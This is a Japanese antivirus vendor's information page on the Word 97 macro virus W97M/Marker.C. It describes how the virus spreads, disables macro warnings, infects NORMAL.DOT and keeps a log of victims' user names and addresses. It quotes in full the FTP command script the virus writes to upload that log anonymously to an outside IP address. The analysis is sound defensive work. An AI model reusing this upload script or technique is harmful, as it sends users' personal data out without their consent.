ウイルス情報

ウイルス名

W97M/Marker.C

危険度
対応定義ファイル 4002 (現在7656)
対応エンジン  (現在5600) 
エンジンバージョンの見分け方
別名 別名
亜種 亜種
発見日(米国日付) 97/05/01


W97M/Marker.Cウイルスは、1999年4月に初めて、WildListに"In The Wild(一般普及ウイルス)"として掲載された。WildList関係者の3人から初めて報告されて以来、このウイルスはたちまち世界中に広まった。現在、最も頻繁に報告されるウイルスの1つと見なされている。

W97M/Marker.Cは、Word 97文書に感染し、Word 97のマクロ警告機能をオフにする。このウイルスは、ThisDocumentというモジュールで構成されている。W97M/Marker.Cが、完全に自己複製するには、MS-Office 97のオリジナルバージョンが必要である。

W97M/Marker.Cは、MS-WordのNORMAL.DOTファイルに感染する。

W97M/Marker.Cのコードには、次の文字列が含まれている(この文字列が表示されることはない)。

"<- this is a marker!"

文書に感染する中で、W97M/Marker.Cは、被害者ログファイルを保持する。この被害者ログファイルには、"C:\HSFnnnn.SYS"という名前が付けられる(ここで、nnnnは、ある程度ランダムな値である)。このログファイル内には、日付、時刻、登録ユーザ名およびアドレス(可能な場合)などの情報が記録される。また、この被害者ログは、このマクロウイルスのソースコードにコメントとして追加される。

また、W97M/Marker.Cは、C:\NETLDX.VXDを作成する。これは、実際、単純なテキストベースのバッチファイルである。このファイルには、次の文字列(より小さいコメント)が存在する。

o 209.201.88.110 ;open the IP address
user anonymous ;attempt to log in as an anonymous user
pass itsme@ ;send a generic anonymous password along
cd incoming ;change to directory: "incoming"
ascii ;set file transfer type to ASCII
put HSFnnnn.SYS ;upload the victim log file
quit ;exit ftp client

毎月の初日に、このウイルスは、密かにDOSボックスへ抜け出してバッチスクリプトを実行しようとする。これにより、被害者ログファイルが指定のIPアドレスにアップロードされる。注: 正常にアップロードするには、インターネットにアクティブ接続されており、さらに、"FTP.EXE"というFTPクライアントが存在する必要がある。実行可能なFTPクライアントは、ほとんどのWindowsベースのシステムに自動的にインストールされている。